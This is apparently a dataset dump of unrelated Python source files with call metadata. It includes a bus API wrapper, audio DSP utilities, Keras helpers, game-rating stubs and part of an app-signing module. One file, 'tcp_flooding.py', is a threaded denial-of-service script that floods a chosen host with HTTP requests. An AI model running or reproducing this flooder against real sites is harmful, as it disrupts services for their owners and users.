[((23, 6, 23, 33), 'logging.getLogger', 'logging.getLogger', ({(23, 24, 23, 32): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((43, 23, 43, 40), 'getpass.getuser', 'getpass.getuser', ({}, {}), '()', False, 'import getpass\n'), ((66, 13, 66, 59), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', ({(66, 40, 66, 48): 'src_host', (66, 50, 66, 58): 'src_user'}, {}), '(src_host, src_user)', False, 'from cloudferry.lib.utils import remote_runner\n'), ((33, 12, 33, 52), 'cloudferry.lib.utils.local.run', 'local.run', ({(33, 22, 33, 51): '"""iscsiadm --help &>/dev/null"""'}, {}), "('iscsiadm --help &>/dev/null')", False, 'from cloudferry.lib.utils import local\n'), ((40, 18, 40, 52), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(40, 48, 40, 51): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n'), ((47, 16, 47, 32), 'cloudferry.lib.utils.local.sudo', 'local.sudo', ({(47, 27, 47, 31): '"""ls"""'}, {}), "('ls')", False, 'from cloudferry.lib.utils import local\n'), ((84, 18, 84, 52), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(84, 48, 84, 51): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n'), ((55, 22, 55, 56), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(55, 52, 55, 55): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n')]
codeforamerica/bongo
bongo/core.py
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
""" A simple wrapper for the Bongo Iowa City bus API. """ import requests as req class Bongo(object): """ A simple Python wrapper for the Bongo Iowa City bus API. """ def __init__(self, format='json'): self.format = format def get(self, endpoint, **kwargs): """Perform a HTTP GET request to the API and return the data.""" if 'format' not in kwargs: kwargs['format'] = self.format url = "http://ebongo.org/api/%s" % (endpoint) response = req.get(url, params=kwargs) return self.convert(response) def convert(self, response): """Convert a request based on the response type.""" content_type = response.headers['content-type'] if content_type == 'application/json': data = response.json elif 'stoplist' in response.url: # The `stoplist` endpoint insists that it's HTML. data = response.json else: data = response.content return data def route(self, tag=None, agency=None, **kwargs): """ Get information on a specific route, or all route listings. >>> Bongo().route('lantern', 'coralville') {"coralville's": {"lantern": "route"}} """ if agency and tag: endpoint = 'route' kwargs['agency'] = agency kwargs['route'] = tag else: endpoint = 'routelist' return self.get(endpoint, **kwargs) def routes(self): """ Same as an empty call to the `route` method. >>> Bongo().routes() {"routes": [1234, 5678, 9999]} """ return self.route() def stop(self, number=None, **kwargs): """ Retrieve information specific to a given stop number. >>> Bongo().stop(8350) {"stop": {"8350": "information"}} """ if number: endpoint = 'stop' kwargs['stopid'] = number else: endpoint = 'stoplist' return self.get(endpoint, **kwargs) def stops(self): """ Same as an empty call to the `stop` method. >>> Bongo().stops() {"stops": [1234, 5678, 9999]} """ return self.stop() def predict(self, number, **kwargs): """ Predict the bus arrival times for a specific stop. >>> Bongo().predict(8350) {"stop": {"8350": "prediction"}} """ endpoint = 'prediction' kwargs['stopid'] = number return self.get(endpoint, **kwargs)
[((21, 19, 21, 46), 'requests.get', 'req.get', (), '', True, 'import requests as req\n')]
janaSunrise/useful-python-snippets
src/security/tcp_flooding.py
f03285b8f0b44f87326ca982129dab80a18697f5
import random import socket import string import sys import threading import time def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None: # Threading support thread_num = 0 thread_num_mutex = threading.Lock() # Utility function def print_status() -> None: global thread_num thread_num_mutex.acquire(True) thread_num += 1 print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...") thread_num_mutex.release() def generate_url_path(): msg = str(string.ascii_letters + string.digits + string.punctuation) data = "".join(random.sample(msg, 5)) return data def attack_() -> None: print_status() url_path = generate_url_path() dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: dos.connect((ip, port)) msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n" dos.send(msg.encode()) except socket.error: print(f"[ERROR] Site may be down | {socket.error}") finally: dos.shutdown(socket.SHUT_RDWR) dos.close() try: host = host.replace("https://", "").replace("http://", "").replace("www.", "") ip = socket.gethostbyname(host) except socket.gaierror: print("[ERROR] Make sure you entered a correct website!") sys.exit(2) all_threads = [] for i in range(request_count): t1 = threading.Thread(target=attack) t1.start() all_threads.append(t1) time.sleep(0.01) for current_thread in all_threads: current_thread.join()
[((12, 23, 12, 39), 'threading.Lock', 'threading.Lock', ({}, {}), '()', False, 'import threading\n'), ((33, 14, 33, 63), 'socket.socket', 'socket.socket', ({(33, 28, 33, 42): 'socket.AF_INET', (33, 44, 33, 62): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((48, 13, 48, 39), 'socket.gethostbyname', 'socket.gethostbyname', ({(48, 34, 48, 38): 'host'}, {}), '(host)', False, 'import socket\n'), ((56, 13, 56, 44), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((60, 8, 60, 24), 'time.sleep', 'time.sleep', ({(60, 19, 60, 23): '(0.01)'}, {}), '(0.01)', False, 'import time\n'), ((26, 23, 26, 44), 'random.sample', 'random.sample', ({(26, 37, 26, 40): 'msg', (26, 42, 26, 43): '5'}, {}), '(msg, 5)', False, 'import random\n'), ((51, 8, 51, 19), 'sys.exit', 'sys.exit', ({(51, 17, 51, 18): '(2)'}, {}), '(2)', False, 'import sys\n'), ((20, 20, 20, 32), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time\n')]
yuvalot/ml_final_project
src/ml_final_project/utils/evaluators/default.py
fefb67c92504ceeb7999e49daa8a8aa5a60f1c61
def default_evaluator(model, X_test, y_test): """A simple evaluator that takes in a model, and a test set, and returns the loss. Args: model: The model to evaluate. X_test: The features matrix of the test set. y_test: The one-hot labels matrix of the test set. Returns: The loss on the test set. """ return model.evaluate(X_test, y_test, verbose=0)[0]
[]
wangjm12138/Yolov3_wang
test.py
3d143c7cd863dec796edede3faedacc6590cab5e
import random class Yolov3(object): def __init__(self): self.num=0 self.input_size=[8,16,32] def __iter__(self): return self def __next__(self): a = random.choice(self.input_size) self.num=self.num+1 if self.num<3: return a else: raise StopIteration yolo=Yolov3() for data in yolo: print(data)
[((10, 6, 10, 36), 'random.choice', 'random.choice', ({(10, 20, 10, 35): 'self.input_size'}, {}), '(self.input_size)', False, 'import random\n')]
huchenxucs/WaveRNN
utils/dsp.py
6d5805d54b8a3db99aa190083b550236f2c15d28
import math import numpy as np import librosa from utils import hparams as hp from scipy.signal import lfilter import soundfile as sf def label_2_float(x, bits): return 2 * x / (2**bits - 1.) - 1. def float_2_label(x, bits): assert abs(x).max() <= 1.0 x = (x + 1.) * (2**bits - 1) / 2 return x.clip(0, 2**bits - 1) def load_wav(path): return librosa.load(path, sr=hp.sample_rate)[0] def save_wav(x, path): # librosa.output.write_wav(path, x.astype(np.float32), sr=hp.sample_rate) sf.write(path, x.astype(np.float32), samplerate=hp.sample_rate) def split_signal(x): unsigned = x + 2**15 coarse = unsigned // 256 fine = unsigned % 256 return coarse, fine def combine_signal(coarse, fine): return coarse * 256 + fine - 2**15 def encode_16bits(x): return np.clip(x * 2**15, -2**15, 2**15 - 1).astype(np.int16) def linear_to_mel(spectrogram): return librosa.feature.melspectrogram( S=spectrogram, sr=hp.sample_rate, n_fft=hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) ''' def build_mel_basis(): return librosa.filters.mel(hp.sample_rate, hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) ''' def normalize(S): return np.clip((S - hp.min_level_db) / -hp.min_level_db, 0, 1) def denormalize(S): return (np.clip(S, 0, 1) * -hp.min_level_db) + hp.min_level_db def amp_to_db(x): return 20 * np.log10(np.maximum(1e-5, x)) def db_to_amp(x): return np.power(10.0, x * 0.05) def spectrogram(y): D = stft(y) S = amp_to_db(np.abs(D)) - hp.ref_level_db return normalize(S) def melspectrogram(y): D = stft(y) S = amp_to_db(linear_to_mel(np.abs(D))) return normalize(S) def stft(y): return librosa.stft( y=y, n_fft=hp.n_fft, hop_length=hp.hop_length, win_length=hp.win_length) def pre_emphasis(x): return lfilter([1, -hp.preemphasis], [1], x) def de_emphasis(x): return lfilter([1], [1, -hp.preemphasis], x) def encode_mu_law(x, mu): mu = mu - 1 fx = np.sign(x) * np.log(1 + mu * np.abs(x)) / np.log(1 + mu) return np.floor((fx + 1) / 2 * mu + 0.5) def decode_mu_law(y, mu, from_labels=True): # TODO: get rid of log2 - makes no sense if from_labels: y = label_2_float(y, math.log2(mu)) mu = mu - 1 x = np.sign(y) / mu * ((1 + mu) ** np.abs(y) - 1) return x def reconstruct_waveform(mel, n_iter=32): """Uses Griffin-Lim phase reconstruction to convert from a normalized mel spectrogram back into a waveform.""" denormalized = denormalize(mel) amp_mel = db_to_amp(denormalized) S = librosa.feature.inverse.mel_to_stft( amp_mel, power=1, sr=hp.sample_rate, n_fft=hp.n_fft, fmin=hp.fmin) wav = librosa.core.griffinlim( S, n_iter=n_iter, hop_length=hp.hop_length, win_length=hp.win_length) return wav
[((43, 11, 44, 91), 'librosa.feature.melspectrogram', 'librosa.feature.melspectrogram', (), '', False, 'import librosa\n'), ((52, 11, 52, 66), 'numpy.clip', 'np.clip', ({(52, 19, 52, 59): '((S - hp.min_level_db) / -hp.min_level_db)', (52, 61, 52, 62): '(0)', (52, 64, 52, 65): '(1)'}, {}), '((S - hp.min_level_db) / -hp.min_level_db, 0, 1)', True, 'import numpy as np\n'), ((64, 11, 64, 35), 'numpy.power', 'np.power', ({(64, 20, 64, 24): '(10.0)', (64, 26, 64, 34): '(x * 0.05)'}, {}), '(10.0, x * 0.05)', True, 'import numpy as np\n'), ((80, 11, 82, 75), 'librosa.stft', 'librosa.stft', (), '', False, 'import librosa\n'), ((86, 11, 86, 48), 'scipy.signal.lfilter', 'lfilter', ({(86, 19, 86, 39): '[1, -hp.preemphasis]', (86, 41, 86, 44): '[1]', (86, 46, 86, 47): 'x'}, {}), '([1, -hp.preemphasis], [1], x)', False, 'from scipy.signal import lfilter\n'), ((90, 11, 90, 48), 'scipy.signal.lfilter', 'lfilter', ({(90, 19, 90, 22): '[1]', (90, 24, 90, 44): '[1, -hp.preemphasis]', (90, 46, 90, 47): 'x'}, {}), '([1], [1, -hp.preemphasis], x)', False, 'from scipy.signal import lfilter\n'), ((96, 11, 96, 44), 'numpy.floor', 'np.floor', ({(96, 20, 96, 43): '((fx + 1) / 2 * mu + 0.5)'}, {}), '((fx + 1) / 2 * mu + 0.5)', True, 'import numpy as np\n'), ((111, 8, 113, 37), 'librosa.feature.inverse.mel_to_stft', 'librosa.feature.inverse.mel_to_stft', (), '', False, 'import librosa\n'), ((114, 10, 116, 59), 'librosa.core.griffinlim', 'librosa.core.griffinlim', (), '', False, 'import librosa\n'), ((20, 11, 20, 48), 'librosa.load', 'librosa.load', (), '', False, 'import librosa\n'), ((95, 51, 95, 65), 'numpy.log', 'np.log', ({(95, 58, 95, 64): '(1 + mu)'}, {}), '(1 + mu)', True, 'import numpy as np\n'), ((39, 11, 39, 48), 'numpy.clip', 'np.clip', ({(39, 19, 39, 28): '(x * 2 ** 15)', (39, 30, 39, 36): '(-2 ** 15)', (39, 38, 39, 47): '(2 ** 15 - 1)'}, {}), '(x * 2 ** 15, -2 ** 15, 2 ** 15 - 1)', True, 'import numpy as np\n'), ((56, 12, 56, 28), 'numpy.clip', 'np.clip', ({(56, 20, 56, 21): 'S', (56, 23, 56, 24): '(0)', (56, 26, 56, 27): '(1)'}, {}), '(S, 0, 1)', True, 'import numpy as np\n'), ((60, 25, 60, 44), 'numpy.maximum', 'np.maximum', ({(60, 36, 60, 40): '(1e-05)', (60, 42, 60, 43): 'x'}, {}), '(1e-05, x)', True, 'import numpy as np\n'), ((69, 18, 69, 27), 'numpy.abs', 'np.abs', ({(69, 25, 69, 26): 'D'}, {}), '(D)', True, 'import numpy as np\n'), ((75, 32, 75, 41), 'numpy.abs', 'np.abs', ({(75, 39, 75, 40): 'D'}, {}), '(D)', True, 'import numpy as np\n'), ((95, 9, 95, 19), 'numpy.sign', 'np.sign', ({(95, 17, 95, 18): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((101, 41, 101, 54), 'math.log2', 'math.log2', ({(101, 51, 101, 53): 'mu'}, {}), '(mu)', False, 'import math\n'), ((103, 8, 103, 18), 'numpy.sign', 'np.sign', ({(103, 16, 103, 17): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((103, 39, 103, 48), 'numpy.abs', 'np.abs', ({(103, 46, 103, 47): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((95, 38, 95, 47), 'numpy.abs', 'np.abs', ({(95, 45, 95, 46): 'x'}, {}), '(x)', True, 'import numpy as np\n')]
koliupy/loldib
loldib/getratings/models/NA/na_talon/na_talon_jng.py
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
from getratings.models.ratings import Ratings class NA_Talon_Jng_Aatrox(Ratings): pass class NA_Talon_Jng_Ahri(Ratings): pass class NA_Talon_Jng_Akali(Ratings): pass class NA_Talon_Jng_Alistar(Ratings): pass class NA_Talon_Jng_Amumu(Ratings): pass class NA_Talon_Jng_Anivia(Ratings): pass class NA_Talon_Jng_Annie(Ratings): pass class NA_Talon_Jng_Ashe(Ratings): pass class NA_Talon_Jng_AurelionSol(Ratings): pass class NA_Talon_Jng_Azir(Ratings): pass class NA_Talon_Jng_Bard(Ratings): pass class NA_Talon_Jng_Blitzcrank(Ratings): pass class NA_Talon_Jng_Brand(Ratings): pass class NA_Talon_Jng_Braum(Ratings): pass class NA_Talon_Jng_Caitlyn(Ratings): pass class NA_Talon_Jng_Camille(Ratings): pass class NA_Talon_Jng_Cassiopeia(Ratings): pass class NA_Talon_Jng_Chogath(Ratings): pass class NA_Talon_Jng_Corki(Ratings): pass class NA_Talon_Jng_Darius(Ratings): pass class NA_Talon_Jng_Diana(Ratings): pass class NA_Talon_Jng_Draven(Ratings): pass class NA_Talon_Jng_DrMundo(Ratings): pass class NA_Talon_Jng_Ekko(Ratings): pass class NA_Talon_Jng_Elise(Ratings): pass class NA_Talon_Jng_Evelynn(Ratings): pass class NA_Talon_Jng_Ezreal(Ratings): pass class NA_Talon_Jng_Fiddlesticks(Ratings): pass class NA_Talon_Jng_Fiora(Ratings): pass class NA_Talon_Jng_Fizz(Ratings): pass class NA_Talon_Jng_Galio(Ratings): pass class NA_Talon_Jng_Gangplank(Ratings): pass class NA_Talon_Jng_Garen(Ratings): pass class NA_Talon_Jng_Gnar(Ratings): pass class NA_Talon_Jng_Gragas(Ratings): pass class NA_Talon_Jng_Graves(Ratings): pass class NA_Talon_Jng_Hecarim(Ratings): pass class NA_Talon_Jng_Heimerdinger(Ratings): pass class NA_Talon_Jng_Illaoi(Ratings): pass class NA_Talon_Jng_Irelia(Ratings): pass class NA_Talon_Jng_Ivern(Ratings): pass class NA_Talon_Jng_Janna(Ratings): pass class NA_Talon_Jng_JarvanIV(Ratings): pass class NA_Talon_Jng_Jax(Ratings): pass class NA_Talon_Jng_Jayce(Ratings): pass class NA_Talon_Jng_Jhin(Ratings): pass class NA_Talon_Jng_Jinx(Ratings): pass class NA_Talon_Jng_Kalista(Ratings): pass class NA_Talon_Jng_Karma(Ratings): pass class NA_Talon_Jng_Karthus(Ratings): pass class NA_Talon_Jng_Kassadin(Ratings): pass class NA_Talon_Jng_Katarina(Ratings): pass class NA_Talon_Jng_Kayle(Ratings): pass class NA_Talon_Jng_Kayn(Ratings): pass class NA_Talon_Jng_Kennen(Ratings): pass class NA_Talon_Jng_Khazix(Ratings): pass class NA_Talon_Jng_Kindred(Ratings): pass class NA_Talon_Jng_Kled(Ratings): pass class NA_Talon_Jng_KogMaw(Ratings): pass class NA_Talon_Jng_Leblanc(Ratings): pass class NA_Talon_Jng_LeeSin(Ratings): pass class NA_Talon_Jng_Leona(Ratings): pass class NA_Talon_Jng_Lissandra(Ratings): pass class NA_Talon_Jng_Lucian(Ratings): pass class NA_Talon_Jng_Lulu(Ratings): pass class NA_Talon_Jng_Lux(Ratings): pass class NA_Talon_Jng_Malphite(Ratings): pass class NA_Talon_Jng_Malzahar(Ratings): pass class NA_Talon_Jng_Maokai(Ratings): pass class NA_Talon_Jng_MasterYi(Ratings): pass class NA_Talon_Jng_MissFortune(Ratings): pass class NA_Talon_Jng_MonkeyKing(Ratings): pass class NA_Talon_Jng_Mordekaiser(Ratings): pass class NA_Talon_Jng_Morgana(Ratings): pass class NA_Talon_Jng_Nami(Ratings): pass class NA_Talon_Jng_Nasus(Ratings): pass class NA_Talon_Jng_Nautilus(Ratings): pass class NA_Talon_Jng_Nidalee(Ratings): pass class NA_Talon_Jng_Nocturne(Ratings): pass class NA_Talon_Jng_Nunu(Ratings): pass class NA_Talon_Jng_Olaf(Ratings): pass class NA_Talon_Jng_Orianna(Ratings): pass class NA_Talon_Jng_Ornn(Ratings): pass class NA_Talon_Jng_Pantheon(Ratings): pass class NA_Talon_Jng_Poppy(Ratings): pass class NA_Talon_Jng_Quinn(Ratings): pass class NA_Talon_Jng_Rakan(Ratings): pass class NA_Talon_Jng_Rammus(Ratings): pass class NA_Talon_Jng_RekSai(Ratings): pass class NA_Talon_Jng_Renekton(Ratings): pass class NA_Talon_Jng_Rengar(Ratings): pass class NA_Talon_Jng_Riven(Ratings): pass class NA_Talon_Jng_Rumble(Ratings): pass class NA_Talon_Jng_Ryze(Ratings): pass class NA_Talon_Jng_Sejuani(Ratings): pass class NA_Talon_Jng_Shaco(Ratings): pass class NA_Talon_Jng_Shen(Ratings): pass class NA_Talon_Jng_Shyvana(Ratings): pass class NA_Talon_Jng_Singed(Ratings): pass class NA_Talon_Jng_Sion(Ratings): pass class NA_Talon_Jng_Sivir(Ratings): pass class NA_Talon_Jng_Skarner(Ratings): pass class NA_Talon_Jng_Sona(Ratings): pass class NA_Talon_Jng_Soraka(Ratings): pass class NA_Talon_Jng_Swain(Ratings): pass class NA_Talon_Jng_Syndra(Ratings): pass class NA_Talon_Jng_TahmKench(Ratings): pass class NA_Talon_Jng_Taliyah(Ratings): pass class NA_Talon_Jng_Talon(Ratings): pass class NA_Talon_Jng_Taric(Ratings): pass class NA_Talon_Jng_Teemo(Ratings): pass class NA_Talon_Jng_Thresh(Ratings): pass class NA_Talon_Jng_Tristana(Ratings): pass class NA_Talon_Jng_Trundle(Ratings): pass class NA_Talon_Jng_Tryndamere(Ratings): pass class NA_Talon_Jng_TwistedFate(Ratings): pass class NA_Talon_Jng_Twitch(Ratings): pass class NA_Talon_Jng_Udyr(Ratings): pass class NA_Talon_Jng_Urgot(Ratings): pass class NA_Talon_Jng_Varus(Ratings): pass class NA_Talon_Jng_Vayne(Ratings): pass class NA_Talon_Jng_Veigar(Ratings): pass class NA_Talon_Jng_Velkoz(Ratings): pass class NA_Talon_Jng_Vi(Ratings): pass class NA_Talon_Jng_Viktor(Ratings): pass class NA_Talon_Jng_Vladimir(Ratings): pass class NA_Talon_Jng_Volibear(Ratings): pass class NA_Talon_Jng_Warwick(Ratings): pass class NA_Talon_Jng_Xayah(Ratings): pass class NA_Talon_Jng_Xerath(Ratings): pass class NA_Talon_Jng_XinZhao(Ratings): pass class NA_Talon_Jng_Yasuo(Ratings): pass class NA_Talon_Jng_Yorick(Ratings): pass class NA_Talon_Jng_Zac(Ratings): pass class NA_Talon_Jng_Zed(Ratings): pass class NA_Talon_Jng_Ziggs(Ratings): pass class NA_Talon_Jng_Zilean(Ratings): pass class NA_Talon_Jng_Zyra(Ratings): pass
[]
derenyilmaz/personality-analysis-framework
utils/turkish.py
9e1f3ac1047b1df07498159de23f88f87644d195
class TurkishText(): """Class for handling lowercase/uppercase conversions of Turkish characters.. Attributes: text -- Turkish text to be handled """ text = "" l = ['ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç'] u = ['I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç'] def __init__(self, text): self.text = text def upper(self): """Converts the text into uppercase letters. Returns string. """ res = "" for i in self.text: if i in self.l: res += self.u[self.l.index(i)] else : res += i.upper() return res def lower(self): """Converts the text into lowercase letters. Returns string. """ res = "" for i in self.text: if i in self.u: res += self.l[self.u.index(i)] else : res += i.lower() return res def capitalize(self): """Converts each first letter to uppercase, and the rest to lowercase letters. Returns string. """ m = self.text.split() res = "" for i in m: res += TurkishText(i[0]).upper() + TurkishText(i[1:]).lower() + " " return res[:-1:]
[]
Soumya117/finnazureflaskapp
app/helpers/geocode.py
794f82596a329ff1a2e4dc23d49903a0ef474f95
import googlemaps gmaps = googlemaps.Client(key='google_key') def get_markers(address): geocode_result = gmaps.geocode(address) return geocode_result[0]['geometry']['location']
[((3, 8, 3, 43), 'googlemaps.Client', 'googlemaps.Client', (), '', False, 'import googlemaps\n')]
aspratyush/dl_utils
tf/estimators/keras_estimator.py
c067831f3c72aba88223c231c7fbc249d997e222
from __future__ import absolute_import from __future__ import division from __future__ import print_function # Imports import os import numpy as np import tensorflow as tf def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128): """ Run the estimator """ if optimizer is None: optimizer = tf.keras.estimators.SGD( lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True) # 1. Compile the model model.compile( optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) # 2. Create an estimator model_est = tf.keras.estimator.model_to_estimator( keras_model=model, model_dir='./lenet') # Training # 3a. Create the training function train_input_fn = tf.estimator.inputs.numpy_input_fn( x={model.input_names[0]: X['train'].astype(np.float32)}, y=Y['train'].astype(np.float32), batch_size=nb_batches, num_epochs=nb_epochs, shuffle=True ) # 3b. Train the model model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches) # Evaluate # 4a. Evaluate the model eval_input_fn = tf.estimator.inputs.numpy_input_fn( x={model.input_names[0]: X['test'].astype(np.float32)}, y=Y['test'].astype(np.float32), batch_size=nb_batches, num_epochs=nb_epochs, shuffle=True ) # 4b. Evaluate the model model_eval = model_est.evaluate(input_fn=eval_input_fn) print(model_eval) return model_est, model_eval def run_from_generator( model, input_func=None, input_func_dict=None, eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None): """ Overloaded function to create an estimator using tf.data.Dataset :param model : uncompiled keras model :param input_fn : input function providing tf.data.Dataset to the estimator :param input_fn_dict : dictionary containing input params for input_fn :param eval_fn_dict : dictionary containing params for eval input_fn :param model_dir : directory to store the trained model """ # 1. Create optimizer and compile model if optimizer is None if (optimizer is None): optimizer = tf.keras.optimizers.SGD( lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True) # 2. compile the model model.compile( optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) # 3. create estimator dir_path = os.path.join(os.getcwd(), model_dir) print("Model path chosen : ", dir_path) if (not os.path.exists(dir_path)): os.mkdir(dir_path) print("Creating estimator...") est = tf.keras.estimator.model_to_estimator( keras_model=model, model_dir=dir_path) # 4. Train and Evaluate the model print("Training...") # training spec train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict), max_steps=500) # evaluation spec eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict)) # Run the training model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec) #est.train(input_fn=lambda: input_func(input_func_dict), # steps=None) # #est.evalute(input_fn=lambda: input_func(eval_func_dict)) return est
[((25, 16, 26, 51), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', (), '', True, 'import tensorflow as tf\n'), ((87, 10, 88, 50), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', (), '', True, 'import tensorflow as tf\n'), ((101, 16, 101, 75), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', ({(101, 48, 101, 51): 'est', (101, 53, 101, 63): 'train_spec', (101, 65, 101, 74): 'eval_spec'}, {}), '(est, train_spec, eval_spec)', True, 'import tensorflow as tf\n'), ((16, 20, 17, 67), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', (), '', True, 'import tensorflow as tf\n'), ((72, 20, 73, 65), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', (), '', True, 'import tensorflow as tf\n'), ((81, 28, 81, 39), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((83, 12, 83, 36), 'os.path.exists', 'os.path.exists', ({(83, 27, 83, 35): 'dir_path'}, {}), '(dir_path)', False, 'import os\n'), ((84, 8, 84, 26), 'os.mkdir', 'os.mkdir', ({(84, 17, 84, 25): 'dir_path'}, {}), '(dir_path)', False, 'import os\n')]
l0ui3/isign
isign/archive.py
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
""" Represents an app archive. This is an app at rest, whether it's a naked app bundle in a directory, or a zipped app bundle, or an IPA. We have a common interface to extract these apps to a temp file, then resign them, and create an archive of the same type """ import abc import biplist from bundle import App, Bundle, is_info_plist_native from exceptions import MissingHelpers, NotSignable, NotMatched from distutils import spawn import logging import os from os.path import abspath, dirname, exists, isdir, isfile, join, normpath import tempfile import re from subprocess import call from signer import Signer import shutil import zipfile REMOVE_WATCHKIT = True helper_paths = {} log = logging.getLogger(__name__) def get_helper(helper_name): """ find paths to executables. Cached in helper_paths """ if helper_name not in helper_paths or helper_paths[helper_name] is None: # note, find_executable returns None is not found # in other words, we keep retrying until found helper_paths[helper_name] = spawn.find_executable(helper_name) log.debug("got executable {} for {}".format(helper_paths[helper_name], helper_name)) return helper_paths[helper_name] def make_temp_dir(): return tempfile.mkdtemp(prefix="isign-") def get_watchkit_paths(root_bundle_path): """ collect sub-bundles of this bundle that have watchkit """ # typical structure: # # app_bundle # ... # some_directory # watchkit_extension <-- this is the watchkit bundle # Info.plist # watchkit_bundle <-- this is the part that runs on the Watch # Info.plist <-- WKWatchKitApp=True # watchkit_paths = [] for path, _, _ in os.walk(root_bundle_path): if path == root_bundle_path: continue try: bundle = Bundle(path) except NotMatched: # this directory is not a bundle continue if bundle.info.get('WKWatchKitApp') is True: # get the *containing* bundle watchkit_paths.append(dirname(path)) return watchkit_paths def process_watchkit(root_bundle_path, should_remove=False): """ Unfortunately, we currently can't sign WatchKit. If you don't care about watchkit functionality, it is generally harmless to remove it, so that's the default. Remove when https://github.com/saucelabs/isign/issues/20 is fixed """ watchkit_paths = get_watchkit_paths(root_bundle_path) if len(watchkit_paths) > 0: if should_remove: for path in watchkit_paths: log.warning("Removing WatchKit bundle {}".format(path)) shutil.rmtree(path) else: raise NotSignable("Cannot yet sign WatchKit bundles") class Archive(object): __metaclass__ = abc.ABCMeta # we use abc.abstractmethod throughout because there are certain class # methods we want to ensure are implemented. @abc.abstractmethod def unarchive_to_temp(self): """ Unarchive and copy to a temp directory """ pass @abc.abstractmethod def archive(cls, path, output_path): """ Archive a directory to an output path """ pass @abc.abstractmethod def get_info(cls, path): """ Obtain app metadata from Info.plist without unarchiving """ pass @abc.abstractmethod def precheck(cls, path): """ Check if this is, in fact, an archive of this type """ pass @abc.abstractmethod def find_bundle_dir(cls, path): """ Locate the directory of the main app (aka bundle) """ pass class AppArchive(Archive): """ The simplest form of archive -- a naked App Bundle, with no extra directory structure, compression, etc """ @classmethod def find_bundle_dir(cls, path): """ Included for similarity with the zipped archive classes. In this case, the bundle dir *is* the directory """ return path @classmethod def _get_plist_path(cls, path): return join(cls.find_bundle_dir(path), "Info.plist") @classmethod def get_info(cls, path): return biplist.readPlist(cls._get_plist_path(path)) @classmethod def precheck(cls, path): if not isdir(path): return False if not os.path.exists(cls._get_plist_path(path)): return False plist = cls.get_info(path) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def archive(cls, path, output_path): if exists(output_path): shutil.rmtree(output_path) shutil.move(path, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) def __init__(self, path): self.path = path self.relative_bundle_dir = '.' self.bundle_info = self.get_info(self.path) def unarchive_to_temp(self): containing_dir = make_temp_dir() log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir) shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already shutil.copytree(self.path, containing_dir) process_watchkit(containing_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, '.', self.__class__) class AppZipArchive(Archive): """ Just like an app, except it's zipped up, and when repackaged, should be re-zipped. """ app_dir_pattern = r'^([^/]+\.app/).*$' extensions = ['.zip'] helpers = ['zip', 'unzip'] @classmethod def is_helpers_present(cls): """ returns False if any of our helper apps wasn't found in class init """ is_present = True for helper_name in cls.helpers: if get_helper(helper_name) is None: log.error("missing helper for class {}: {}".format(cls.__name__, helper_name)) is_present = False break return is_present @classmethod def is_archive_extension_match(cls, path): """ does this path have the right extension """ log.debug('extension match') for extension in cls.extensions: log.debug('extension match: %s', extension) if path.endswith(extension): return True return False @classmethod def find_bundle_dir(cls, zipfile_obj): relative_bundle_dir = None apps = set() file_list = zipfile_obj.namelist() for file_name in file_list: matched = re.match(cls.app_dir_pattern, file_name) if matched: apps.add(matched.group(1)) if len(apps) == 1: log.debug("found one app") relative_bundle_dir = apps.pop() elif len(apps) > 1: log.warning('more than one app found in archive') else: log.warning('no apps found in archive') return relative_bundle_dir @classmethod def _get_plist_path(cls, relative_bundle_dir): return join(relative_bundle_dir, "Info.plist") @classmethod def precheck(cls, path): """ Checks if an archive looks like this kind of app. Have to examine within the zipfile, b/c we don't want to make temp dirs just yet. This recapitulates a very similar precheck in the Bundle class """ if not isfile(path): return False if not cls.is_helpers_present(): raise MissingHelpers("helpers not present") is_native = False log.debug('precheck') log.debug('path: %s', path) if 